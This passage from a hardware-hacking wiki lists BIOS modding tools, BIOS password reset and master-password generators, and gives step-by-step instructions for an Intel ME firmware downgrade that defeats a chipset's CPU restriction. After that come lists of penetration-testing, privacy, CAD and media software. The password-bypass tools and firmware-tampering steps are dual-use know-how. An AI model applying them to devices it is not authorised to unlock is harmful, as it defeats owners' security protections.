:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.53.exe AMIBCP_4.53] [https://www.virustotal.com/gui/file/3f90e402dab9f64cbc4514e18bc2625ec7672da806cd9e0ef2e803b0ce104a01 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.55.exe AMIBCP_4.55] [https://www.virustotal.com/gui/file/451ad821a66e9ea89ee0544ce53cfab887dc0bb662a2de95f0e1aa1663dc6e06 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_2.22.1.exe MMTOOL_2.22.1] - MMtool stands for Module Management Tool. As one of AMI's BIOS/UEFI utilities, MMTool allows users to manage firmware file modules within the Aptio ROM image. [https://www.virustotal.com/gui/file/cf49f1e742f5cce68152f3c17df29e5c9aa7fb557c432402199159ffda44e007 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.12.exe MMTOOL_3.12] [https://www.virustotal.com/gui/file/78c3ca427878be5b07058f422914027462d3ac740b0de247169cc0aee4195e3b VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOl_3.19.exe MMTOOl_3.19] [https://www.virustotal.com/gui/file/b4b30c6ff911f18d3383b094628f59aa5ec3b109acd12aaef391acf9720e52af VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.19_Mod_21FiX.exe MMTOOL_3.19_Mod_21FiX] [https://www.virustotal.com/gui/file/66e2717fcac67b073d24916c74bc8d8dd7932b188d20b8b635b511e6195d5855 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22.EXE MMTOOL_3.22] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_1B_21Fix-BKMOD.EXE MMTOOL_3.22_1B_21Fix-BKMOD] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_CN_BKMod.exe MMTOOL_3.22_CN_BKMod] [https://www.virustotal.com/gui/file/f467d75962278a4e01d646cdf8008136912d8a1ddd588c45e2fcee9d7cd17140 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.23_CN_BKMod.exe MMTOOL_3.23_CN_BKMod] [https://www.virustotal.com/gui/file/9bf846d023312c889069b03f5ab7157e270fc67c5d295e745d0a5f27d12a71de VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.26.exe MMTOOL_3.26] [https://www.virustotal.com/gui/file/c5a64ea7ce2bea8556fa81e0069adbba793181bfaa76f59f4f472f0a471bac98 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_4.50.0.23.exe MMTOOL_4.50.0.23][https://www.virustotal.com/gui/file/7d0377a72e67e5a71400361416452440826832aeb2c9bebaa578e8af962eaafd VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.0.07.exe MMTOOL_5.0.07] [https://www.virustotal.com/gui/file/28049163fd1e3423c42b229a5f6ed877f14e7caf3b794bf7efb970b375e6ff41 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0024.exe MMTOOL_5.02.0024] [https://www.virustotal.com/gui/file/bbc3e75905997ddc05c523e57a72e49bbfcaf84dca64e460f10f8553b7fda9ee VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0025.exe MMTOOL_5.02.0025] [https://www.virustotal.com/gui/file/5d05d0bbea720d4b73dc66db55031c2659458696b9f143df3b7e2f43040289cc VT link]
:::'''Award'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/tree/main/Award_Bios_Editor Award Bios Editor] - is a editor for Award bios.
:::'''InsydeH2O'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.02.13.zip H2OEZE_x86_WIN_100.00.02.13] - H2OEZE™: Easy BIOS Editor that helps edit binaries in the BIOS, including Option ROMs, driver binaries, logos, and Setup values. [https://www.virustotal.com/gui/file/9660f1bf9436b258ec5ad857a94fbd0ec1f8fbff8ab22ca1dfcfb5ebbdcedf08 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.03.04.zip H2OEZE_x86_WIN_100.00.03.04] [https://www.virustotal.com/gui/file/2a1005803da854693502093445906eb2cccb24947d6828bc1533ba3603c73b0a VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x64/H2OEZE_x64_WIN_100.00.03.04.rar H2OEZE_x64_WIN_100.00.03.04] [https://www.virustotal.com/gui/file/20d2d0336d30afd0b1961eb42dc061ce66a6fcfbfba1530e7abd9be883dcb45c VT link]
:::'''Phoenix'''
:::*[[Media:PhoenixBiosEditor2.2.13.zip]] (pw: recessim.com [https://www.virustotal.com/gui/file/3abf75ea7386f3dc24156bf6175a940867b8c742246cb8bf257fe5fc0b1cf9b5 VT link]) - is a software tool used to view and modify the settings and structure of Phoenix BIOS firmware images dating from between 2004 and 2008.

:Download all* the above tools in one archive, [https://github.com/direstraits96/BIOS-MOD-TOOLS/archive/refs/heads/main.zip click here]. [https://www.virustotal.com/gui/file/d8a75883ca8d292adcf40e5ed88584579b1c0c69f6ad5837fc56747233c56f9c VT link]

:::'''Tool collections'''
:::*[http://xdel.ru/downloads/bios-mods.com-tools/ bios-mods.com tools (2016)] - is a collection of bios modifying and flashing tools.

:::'''Microcode Extraction Tool'''
:::*[https://github.com/platomav/MCExtractor MCExtractor] - is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc.

:Bios password resetting
::*[https://archive.org/details/hp-bios-reset-mazzif HP BIOS Password Reset by MAZZIF] [https://www.virustotal.com/gui/file/9ddd094edc286f2cb8d63158d226986d9a0c184ca450580dfaf9754005df9d41 VT link] - A live USB tool made by Mazzif to reset older HP Probook and Elitebook BIOS passwords.

::*[[Media:Fujitsu bios unlock.zip|pwgen-fsi-6x4dec.py]] [https://www.virustotal.com/gui/file/3a43ba7c88f1f10576728ea291b3097c048f842eee30dda3121280c049c61b8a VT link] pwgen-fsi-6x4dec.py - is a python command-line utility for generating master unlock password for older Fujitsu notebooks. Tested on: E557, FH570, Q616, U728, T731, E734, U745, S752, E756

::*[https://github.com/dogbert/bios-pwgen/tree/master bios-pwgen] - BIOS Master Password Generators for older laptops [http://dogber1.blogspot.com/2009/05/table-of-reverse-engineered-bios.html blogpost] (dell, asus, fsi6x4, fxi-hex hpmini, insyde, samsung, sony-4x4, sony-serial).

::*[[Media:AMITSEDecrypt.zip]] [https://www.virustotal.com/gui/file/2b03ef2292863bd94dc6ce0f10412f27ec5abf95f1e3aca2d34dd3712fd45d12 VT link] - AMI supervisor password decoder called "AMITSEDecrypt" to decode them with the XOR key. Works on older AMI firmware images is able to recover supervisor password if set.

::*[https://bios-pw.org/ BIOS Master Password Generator (bios-pw.org)] - is a website that provides default or master BIOS unlock passwords for various laptop brands based on the system-generated hash or code displayed after too many failed BIOS password attempts.

=====HM70 PCH chipset Bypass Unsupported CPU=====
:Machine shuts down after 30 minutes if a '''"unsupported CPU"''' (Intel Core i3, i5 or i7) is installed in a notebook using the HM70 chipset. 
:The HM70 is aimed at entry-level laptops and budget-conscious consumers, and therefore is locked to [https://www.cpu-upgrade.com/mb-Intel_(chipsets)/HM70_Express.html support only dual core Pentium and Celeron CPUs..] 
:Intel has restricted this chipset in the firmware to shut down after 30 minutes if users attempt to upgrade their entry-level laptops.
::[[File:Hm70.png|none|thumb|200px|Intel HM70 PCH chipset. CPUs supported: Intel Pentium & Intel Celerons. [https://www.intel.com/content/www/us/en/products/sku/67419/mobile-intel-hm70-express-chipset/compatible.html Intel source]]]

======Intel Management Engine Firmware Downgrade Attack======

::First analyze the firmware after you have made a back-up. Make note of the Intel ME version.
::Then download the Intel ME version just below the firmware version you try to downgrade.
::Fire up your hex editor search in your bios blob for '''"0x24, 0x46, 0x50, 0x54, 0x0F, 0x00, 0x00, 0x00, 0x20"''' Intel ME 1.5M blob will start ascii text '''"$FPT"'''.
::Replace that entire section with the new downgraded Intel ME 1.5m blob. Before flashing make sure Me Analyzer recognises the change. Flash the modification and test it.
::If you don't see the ME version change with Me Analyzer first try to make note of the offset the Intel ME blob is at and then run it through me_cleaner before injecting a older one.

::This downgrade attack successfully bypassed the 30 minute shutdown restriction timer.

:'''Required tools''':
::*[[Software_Tools#Hex_Editors|Hex Editor.]]
::*[https://github.com/platomav/MEAnalyzer Me Analyzer] - Intel Engine & Graphics Firmware Analysis Tool.
::*[https://github.com/corna/me_cleaner me_cleaner] - Tool for partial deblobbing of Intel ME/TXE firmware images.
::*[https://winraid.level1techs.com/t/intel-conv-sec-management-engine-drivers-firmware-and-tools-2-15/30719 Intel (Converged Security) Management Engine: Drivers, Firmware and Tools for (CS)ME 2-15] - Useful resource.
::*[https://mega.nz/folder/2Q0klQpA#6o04nlV_4xqfx76tjvgi4g (CS)ME Firmware Archive.]

----

====Operating Systems====
Below are categories of operating systems used for various purposes, including binary reverse engineering, local software analysis, and wireless penetration testing with SDR for RF signal analysis.
=====Mostly X86-64=====
======Penetration Testing & Digital Forensics======
*[https://www.kali.org/ Kali Linux] - is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.

*[https://www.backbox.org/ BlackBox] is more than an operating system, it is a Free Open Source Community Project with the aim of promoting the culture of security in IT environment and give its contribution to make it better and safer.

*[https://blackarch.org/ BlackArch] - is an Arch Linux-based penetration testing distribution for penetration testers and security researchers.

*[https://www.parrotsec.org/ Parrot Security] - is based on top of Debian, the most advanced and recognized universal operating system that can run anywhere.

*[https://labs.fedoraproject.org/security/ Fedora Security Spin] - is a live media based on Fedora to provide a safe test environment for working on security auditing, forensics and penetration testing, coupled with all the Fedora Security features and tools.

*[https://www.caine-live.net/ CAINE] - CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project.

*[https://github.com/dracos-linux Dracos Linux] - is the Linux operating system from Indonesia, open source is built based on Debian live project under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering.

*[https://www.pentoo.ch/ Pentoo] - is a Live CD and Live USB designed for penetration testing and security assessment. Based off Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd.

======RF Signals Analysis OS [RISC SBC & X86-64]======
*[https://cemaxecuter.com/ DragonOS] - Out of the box OS for SDRs. Supports Raspberry Pi and x86-64.

======Privacy Operating System======
*[https://tails.net/ Tails] - is a portable operating system that protects against surveillance and censorship.
*[https://www.qubes-os.org/ Qubes OS] - is a security-focused operating system that uses virtualization to isolate applications and tasks into separate compartments (called qubes), protecting the system even if one part gets compromised.
*[https://www.whonix.org/ Whonix] is a privacy-focused Linux distribution that routes all internet traffic through the Tor network using a two-part system of an isolated gateway and a workstation to provide strong anonymity and security.

======Windows 10 IoT LTSC======
*[https://rentry.co/LTSC LTSC IoT Windows 10 debloat & setup guide] [[Media:LTSC.pdf]] - Useful when you want a clean debloated Windows 10 virtual machine. The IoT LTSC channel receives security updates until Jan 13, 2032.

*[https://rentry.org/fwt2 fwt2] [[Media:Fwt2.pdf]] - Read the /fwt/ paste for a more general overview of Windows.

======Previous Windows versions======
*[https://hackandpwn.com/windows-7-esu-patching/ Windows 7 ESU Patching] - Information about the minimum set of updates needed for Windows 7 latest ESU hotfixes/patches.

=====Embedded Devices [Network equipment]=====

*[https://openwrt.org/ OpenWrt] - is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic.

*[https://dd-wrt.com/ DD-WRT] - is a Linux based alternative OpenSource firmware suitable for a great variety of WLAN routers and embedded systems. The main emphasis lies on providing the easiest possible handling while at the same time supporting a great number of functionalities within the framework of the respective hardware platform used.

*[https://www.pfsense.org/ pfSense] - is a free and open-source operating system for firewalls and routers, primarily based on FreeBSD, that provides a comprehensive network security solution.

*[https://opnsense.org/ OPNsense] - is an open-source firewall and routing platform built on FreeBSD. It's designed to be user-friendly and easy to configure, offering a wide range of features found in commercial firewalls, plus many more.

=====Smartphones [Android "de-google"]=====

*[https://lineageos.org/ LineageOS] - is a free and open-source operating system for Android devices, based on the Android mobile platform.

*[https://grapheneos.org/ GrapheneOS] - is a privacy and security focused mobile OS with Android app compatibility developed as a non-profit open source project.

*[https://sailfishos.org/ Sailfish OS] - is a secure mobile operating system optimized to run on smartphones and tablets, and also easily adaptable to all kinds of embedded devices and use cases.

*[https://calyxos.org/ CalyxOS] - is a privacy-focused, "de-googled" Android-based operating system created by the Calyx Institute. It aims to defend online privacy, security, and accessibility by removing Google services and replacing them with free and open-source alternatives.

*[https://crdroid.net/ crDroid] - is a highly customized, free Android ROM, based on LineageOS, designed for gaming and customization.

*[https://www.ubuntu-touch.io/ Ubuntu Touch] - is a mobile operating system developed by the UBports community, based on the GNU/Linux operating system. It's a mobile version of Ubuntu, designed for touch-screen devices like smartphones and tablets, with a desktop-like experience.

----

====Tools for opening CAD or Boardview files====
'''Description''': Boardview is a type of file containing information about printed circuit boards, their components, used signals, test points and more. These files may have following extensions: .asc, .bdv, .brd, .bv, .cad, .cst, .gr, .f2b, .fz, .tvw and others.

*[https://pldaniels.com/flexbv5/ FlexBV] - Advanced FlexBV boardview software integrates your boardview files with PDF schematics to substantially ease the process of tracking down faults and understanding damaged boards

*[https://openboardview.org/ OpenBoardView] - is a Open Source Linux SDL/ImGui edition software for viewing .brd files, intended as a drop-in replacement for the "Test_Link" software and "Landrex".

*[https://www.cadence.com/ko_KR/home/tools/allegro-downloads-start.html Allegro®/OrCAD® FREE Physical Viewer] - is a free download that allows you to view and plot databases from Allegro PCB Editor, OrCAD PCB Editor, Allegro Package Designer, and Allegro PCB SI technology.

*[http://boardviewer.net/ BoardViewer] - is software intended for viewing various boardview file types like .tvw files and much more supported formats.

*CADview - simple old tool for viewing CAD files of PCB's (Windows). [[Media:CAD View.zip]] [https://www.virustotal.com/gui/file/9a64621ff34d8d674ba6580538908f4ea170fee9cc1cb700485bd41e3a3a42df VT link]

For resources to open in your favorite boardview program visit
[[Literature#Datasheets.2C_boardviews.2C_schematics.2C_manuals|Literature -> Datasheets boardviews & schematics]]

----

====Custom PCB Development Software====

=====Definition and Purpose=====
::'''Computer-Aided Design (CAD)''' refers to software that enables users to create, modify, analyze, or optimize designs in various fields such as architecture, mechanical engineering, and manufacturing. CAD is predominantly used for designing physical structures and components. It allows designers to visualize objects in two-dimensional (2D) or three-dimensional (3D) formats, facilitating precise planning and adjustments before production begins.

::In contrast, '''Electronic Design Automation (EDA)''' encompasses a suite of software tools specifically tailored for the design of electronic systems. EDA is crucial in industries like semiconductor manufacturing and printed ::circuit board (PCB) design. It focuses on automating the processes involved in designing electronic circuits at various levels—from high-level architectural descriptions down to detailed layouts.

::'''Integration Between CAD and EDA'''
::While CAD focuses on physical structures, EDA deals with electronic components. However, as products increasingly integrate both mechanical structures and electronic systems—such as IoT devices—the need for collaboration between CAD and EDA has grown. This integration allows designers to embed electronic circuits within mechanical models seamlessly.

=====Electronics Design Automation [[Wikipedia:Electronic_design_automation|(EDA)]] Suite for Developing Custom PCB's=====

*[https://www.kicad.org/ KiCAD] - is a free CAD suite for electronic design automation (EDA). It facilitates the design and simulation of electronic hardware. It features an integrated environment for schematic capture, PCB layout, manufacturing file viewing, ngspice-provided SPICE simulation, and engineering calculation.

*[https://easyeda.com/ EasyEDA] - EasyEDA is a web-based EDA tool suite that enables hardware engineers to design, simulate, share - publicly and privately - and discuss schematics, simulations and printed circuit boards. It can also be used [https://docs.easyeda.com/en/FAQ/Client/index.html offline].

*[https://fritzing.org/ Fritzing] - is an open-source hardware initiative that makes electronics accessible as a creative material for anyone.

*[https://librepcb.org/ LibrePCB] - is a free, cross-platform, easy-to-use electronic design automation suite to draw schematics and design printed circuit boards – for makers, students and professionals, from beginners to experts.

*[http://www.geda-project.org/ gEDA Project] - The gEDA project has produced and continues working on a full GPL'd suite and toolkit of Electronic Design Automation tools. These tools are used for electrical circuit design, schematic capture, simulation, prototyping, and production.

*[http://repo.hu/projects/pcb-rnd/ pcb-rnd] - is a free/open source, flexible, modular Printed Circuit Board editor. For design of professional and hobby boards. Is feature-rich and compatible. Has a long history, fast paced development, and big plansand is part of the coralEDA ecosystem.

=====Computer Aided Design [[Wikipedia:Computer-aided_design|(CAD)]] Mechanical Engineering=====

*[https://www.freecad.org/ FreeCAD] - is an open-source parametric 3D modeler made primarily to design real-life objects of any size. Parametric modeling allows you to easily modify your design by going back into your model history and changing its parameters.

*[https://openscad.org/ OpenSCAD] - is software for creating solid 3D CAD objects. It is free software and available for Linux/UNIX, MS Windows and Mac OS X.

*[https://brlcad.org/ BRL-CAD] - is a powerful open source cross-platform solid modeling system that includes interactive geometry editing, high-performance ray-tracing for rendering and geometric analysis, a system performance analysis benchmark suite, geometry libraries for application developers, and more than 30 years of active development.

*[https://solvespace.com/index.pl SolveSpace] - is a free (GPLv3) parametric 3d CAD tool. Modeling 3d parts, modeling 2d parts, 3d-printed parts, preparing CAM data, mechanism design, plane and solid geometry.

----
====Other software====

=====Display Driver Utilities (Windows)=====

*[https://github.com/lostindark/DriverStoreExplorer Driver Store Explorer (RAPR)] - is a tool used to manage the Windows driver store, a repository of driver packages that Windows uses to install and update hardware drivers. It helps users list, add, install, delete, and export driver packages, especially those from third-party vendors.

*[https://github.com/Wagnard/display-drivers-uninstaller DDU] - is a driver removal utility that can help you completely uninstall AMD/NVIDIA/Intel graphics card drivers and packages from your system, without leaving leftovers behind (including registry keys, folders and files, and driver store).

*[https://www.techpowerup.com/nvcleanstall/ NVCleanstall] - is a free utility from TechPowerUp that allows you to customize your NVIDIA GeForce driver installation. It enables you to remove unnecessary components and install only the drivers you need, potentially optimizing your system performance and minimizing "bloatware".

*[https://github.com/GSDragoon/RadeonSoftwareSlimmer Radeon Software Slimmer] - is a utility to trim down the bloat with Radeon Software for AMD GPUs on Microsoft Windows.

*[https://forums.guru3d.com/threads/nvslimmer-nvidia-driver-slimming-utility.423072/ NVSlimmer] - is a third-party utility created by uKER and available on guru3d.com that allows users to remove unwanted components from NVIDIA graphics driver installations, effectively "trimming" down the install base. It's not an official Nvidia utility.

=====Host Based Firewall [Windows FOSS]=====
*[https://github.com/tnodir/fort Fort Firewall] - is a very practical firewall that allows you to manage your privacy and security in Windows simply and flexibly. This open-source tool is a perfect alternative to the standard Windows firewall, giving you a lot of customizable features so you can work with your files and programs more comfortably.

=====Web Browsing=====
*[https://www.mozilla.org/firefox/ Mozilla Firefox] - is a free, open source web browser developed by the Mozilla Foundation and Mozilla Corporation in 2004. The Firefox web browser can be used with Windows, Mac and Linux operating systems, as well as Android and iOS mobile devices.

::Extensions & Configurations
:::*[https://github.com/hackademix/noscript NoScript] - The popular NoScript Security Suite browser extension.
:::*[https://github.com/ChrisAntaki/disable-webrtc-firefox WebRTC block] - WebRTC leaks your actual IP addresses from behind your VPN, by default. With this extension you can disable it.
:::*[https://github.com/arkenfox/user.js/ user.js] - Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening.
:::*[https://github.com/yokoffing/Betterfox Betterfox] - Firefox speed, privacy, and security: a user.js template for configuration. Your favorite browser, but better.
:::*[https://github.com/gorhill/uBlock uBlock] - Help users neutralize privacy-invading ads CPU and memory-efficient.
:::*[https://github.com/sereneblue/chameleon Chameleon] - is a WebExtension port of the popular Random Agent Spoofer. Spoofs a lot of client fingering techniques and adds security.
:::*[https://github.com/EFForg/privacybadger Privacy Badger] - is a browser extension that automatically learns to block invisible trackers. PB is made by the leading digital rights nonprofit EFF to stop companies from spying on you.

*[https://www.torproject.org/ Tor Browser] - [[Wikipedia:Tor_(network)|Tor]] (The Onion Router) is a network that anonymizes web traffic to provide truly private web browsing. The Tor Browser hides your IP address and browsing activity by redirecting web traffic through a series of different routers known as nodes.

*[https://guardianproject.info/apps/org.torproject.android/ Orbot for Android] - is a free proxy app that empowers other apps to use the internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities.

======Public Networks======

*[https://www.torproject.org/ [[Wikipedia:Tor_(netwerk)|Tor]]] - is an open-source privacy network that enables anonymous web browsing. The worldwide Tor computer network uses secure, encrypted protocols to ensure that users' online privacy is protected.

*[https://geti2p.net/ The Invisible Internet Project [[Wikipedia:I2P|(I2P)]]] - is a fully encrypted private network layer. It protects your activity and location. Every day people use the network to connect with people without worry of being tracked or their data being collected.

*[https://www.freenet.de/ FreeNet] - is a peer-to-peer platform for censorship-resistant, anonymous communication. It uses a decentralized distributed data store to keep and deliver information, and has a suite of free software for publishing and communicating on the Web without fear of censorship.

*[https://zeronet.io/ ZeroNet] - Open, free and uncensorable websites, using Bitcoin cryptography and BitTorrent network · We believe in open, free, and uncensored network.

*[https://lokinet.org/ Lokinet] - is an onion-router that lets you access the internet anonymously. Built on LLARP, the fastest onion-routing protocol in the world.

*[https://nymtech.net/ Nym] - protect internet traffic by routing it through a decentralised mixnet that can be accessed anonymously using zk-nyms.

=====Email Clients / Email Encryption Standards=====
*[https://www.thunderbird.net/ Mozilla ThunderBird] - is a free, open-source, cross-platform application for managing email, news feeds, chat, and news groups. It is a local email application, meaning it installs and runs as a client on your device, being rather than browser or web-based. [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq FAQ How to implement OpenPGP in Thunderbird].

*[https://www.openpgp.org/ OpenPGP] - is the most widely used email encryption standard. It is defined by the OpenPGP Working Group of the Internet Engineering Task Force (IETF) as a Proposed Standard in RFC 4880. OpenPGP was originally derived from the PGP software, created by Phil Zimmermann.

*[https://www.gnupg.org/ GnuPG] - is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications.

*[https://wiki.gnome.org/Apps/Evolution Evolution] - is a personal information management application that provides integrated mail, calendaring and address book functionality. Check the Privacy Policy sub-page for a general information about user data usage. [https://riseup.net/en/email/clients/evolution FAQ How to implement OpenPGP in Evolution].

*[https://neomutt.org/ NeoMutt] - is a command line mail reader (or MUA ). It's a fork of Mutt with added features.

=====Chat Applications / Platforms=====
*[https://www.teamspeak.com/ TeamSpeak] - is a VoIP application for audio communication between users via a chat channel, similar to a video meeting. Cross-platform with military-grade security, lag-free performance, privacy and complete control.
*[https://github.com/RetroShare/RetroShare RetroShare] - is a Free and Open Source cross-platform, Friend-2-Friend and secure decentralised communication platform.
*[https://github.com/JFreegman/toxic Toxic] - is a Tox-based P2P messenger that provides end-to-end encrypted communications without the use of centralized servers. It supports text messaging, file sharing, 1-on-1 voice and video calls, private audio conferences, public and private text group chats.
*[https://www.jabber.org/ Jabber] - is a original messaging service based on [https://xmpp.org/ XMPP] and has been continuously offered for free since 1999.
::XMPP clients
:::*[https://xmpp.org/software/ XMPP client list] - is a list of XMPP clients composed by XMPP itself.
:::*[https://otr.cypherpunks.ca/ Off-the-Record Messaging (OTR) for XMPP] - is a cryptographic protocol that provides encryption for instant messaging conversations. OTR uses a combination of AES symmetric-key algorithm with 128 bits key length, the Diffie–Hellman key exchange with 1536 bits group size, and the SHA-1 hash function.
*[https://getsession.org/ Session] - Session is an end-to-end encrypted messenger that minimises sensitive metadata, designed and built for people who want absolute privacy and freedom from any form of surveillance.
*[https://github.com/briar Briar] - is a messaging app designed for activists, journalists, and anyone else who needs a safe, easy and robust way to communicate. Unlike traditional messaging apps, Briar doesn't rely on a central server - messages are synchronized directly between the users' devices.
*[https://matrix.org/ Matrix] - is an open network for secure, decentralised communication.
*[https://discord.com/ Discord] - is a voice, video and text communication service used by over a hundred million people to hang out and talk with their friends and communities.
::Discord client advice
:::*1. Stop using the installed electron PC based version. Use the web version.
:::*2. Android stock client is spoiled with rubbish code slowing down your SoC and sending loads of analytics, use [https://github.com/Aliucord/Aliucord Aliucord] instead (but carefully read the readme.md, ToS issue).

=====File Archiver Utilities=====

*[https://www.7-zip.org/ 7-Zip] - is a free and open source file archiver.

*[https://github.com/M2Team/NanaZip NanaZip] - is a free and open source file archiver intended for the modern Windows experience.

*[https://peazip.github.io/ PeaZip] - is a free and open source file archiver, similar to WinRar, WinZip, and 7-Zip.

=====Disk Encryption Software=====

*[https://guardianproject.info/archive/luks/ Linux Unified Key Setup (LUKS)] - The Linux Unified Key Setup (LUKS) is a disk encryption specification created by Clemens Fruhwirth in 2004 and originally intended for Linux. LUKS implements a platform-independent standard on-disk format for use in various tools

*[https://www.veracrypt.fr/code/VeraCrypt/ VaraCrypt] - VeraCrypt is free open-source disk encryption software for Windows, Mac OS X and Linux. Support for on-the-fly encryption [[Wikipedia:Disk_encryption|(OTFE)]].

=====Image Manipulation Tools=====

*[https://www.gimp.org/ Gimp] - is the official website of the GNU Image Manipulation Program (GIMP). GIMP is a cross-platform image editor available for GNU/Linux, macOS, Windows and more operating systems. It is free software, you can change its source code and distribute your changes.

*[https://www.getpaint.net/ Paint.net] - is image and photo editing software for PCs that run Windows. It features an intuitive and innovative user interface with support for layers, unlimited undo, special effects, and a wide variety of useful and powerful tools. An active and growing online community provides friendly help, tutorials, and plugins.

=====Video Editing Software / 3D Creation / Dec, Enc, Transcode, etc / Media Players=====

*[https://www.blackmagicdesign.com/products/davinciresolve DaVinci Resolve] - is the world’s only solution that combines editing, color correction, visual effects, motion graphics and audio post production all in one software tool! Its elegant, modern interface is fast to learn and easy for new users, yet powerful for professionals.

*[https://shotcut.org/ Shotcut] - is a free, Open Source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support to 4k.

*[https://www.openshot.org/nl/ OpenShot] - is a free, Open Source video editor for Linux, Mac, and Windows. We designed OpenShot to be an easy to use, quick to learn, and surprisingly powerful video editor. Easily cut, slice, and edit any video or film.

*[https://www.blender.org/ Blender] - is the free and open source 3D creation suite. It supports the entirety of the 3D pipeline—modeling, rigging, animation, simulation, rendering, compositing and motion tracking, even video editing and game creation.

*[https://ffmpeg.org/ FFMPEG (Command line interface to convert different formats)] - FFmpeg is the leading multimedia framework, able to decode, encode, transcode, mux, demux, stream, filter and play pretty much anything that humans and machines have created. It supports the most obscure ancient formats up to the cutting edge.

*[https://handbrake.fr/features.php HandBrake] - is an Open Source video transcoder available for Linux, Mac, and Windows. Everyone can use HandBrake to make videos for free. HandBrake is a post-production tool. Its primary purpose is to convert videos from supported source formats to MP4 or MKV format.

*[https://www.videolan.org/ VLC Player] - VLC Media Player (also known as VLC) is a free, open source multimedia player developed by VideoLAN Organization. It is one of the oldest (released for the first time in February 2001) free, portable, cross-platform multimedia player. You can use it to play all popular multimedia files and also DVDs, CDs, VCDs and other streaming protocols.

=====Video Recording and Live Streaming=====

*[https://obsproject.com/ OBS (Open Broadcaster Software)] - is free and Open Source software for video recording and live streaming.

*[https://streamlabs.com/ StreamLabs] - is free live streaming and recording software for Twitch, YouTube, and more for Windows or Mac.

====Search engine (self-hosted & open-source)====
*[https://github.com/searxng/searxng SearXNG] - is a free and open-source metasearch engine that prioritizes user privacy. It works by aggregating results from various search engines, such as Google, Bing, and DuckDuckGo, without tracking or profiling users. Essentially, it acts as a privacy-respecting proxy for your searches.

*[https://github.com/neon-mmd/websurfx websurfx] - is a free and open-source metasearch engine written in Rust, designed to provide a fast, secure, and privacy-respecting alternative to search engines like SearX. It aggregates results from other search engines without displaying ads, focusing on speed, security, and user privacy.

*[https://github.com/mwmbl/mwmbl Mwmbl] - is a non-profit, open source search engine where the community determines the rankings. We aim to be a replacement for commercial search engines such as Google and Bing.

*[https://github.com/yacy/yacy_search_server YaCy] - is a free, open-source, peer-to-peer (P2P) search engine that operates without a central authority. It differs from traditional search engines by allowing users to create their own local or global indexes and share them with other users, creating a decentralized network.

====Social Network / Fediverse (self-hosted & open-source)====

*[https://joinmastodon.org/ Mastodon] - is a free and open-source software for running self-hosted social networking services. It has microblogging features similar to Twitter, which are offered by a large number of independently run nodes, known as instances or servers, each with its own code of conduct, terms of service, privacy policy, privacy options, and content moderation policies. [https://github.com/mastodon/mastodon Github repo].

*[https://github.com/pixelfed/pixelfed PixelFed] - is a decentralized, open-source social media platform focused on photo and video sharing, designed as an alternative to Instagram. It utilizes the ActivityPub protocol, allowing users to interact with accounts on other Pixelfed servers as if they were on the same platform.

*[https://github.com/movim/movim Movim] - is a federated blogging and chat platform that acts as a web frontend for the XMPP protocol.

*[https://github.com/emilebosch/awesome-fediverse Big fediverse list] - is a curated list of more decentralized social networks.

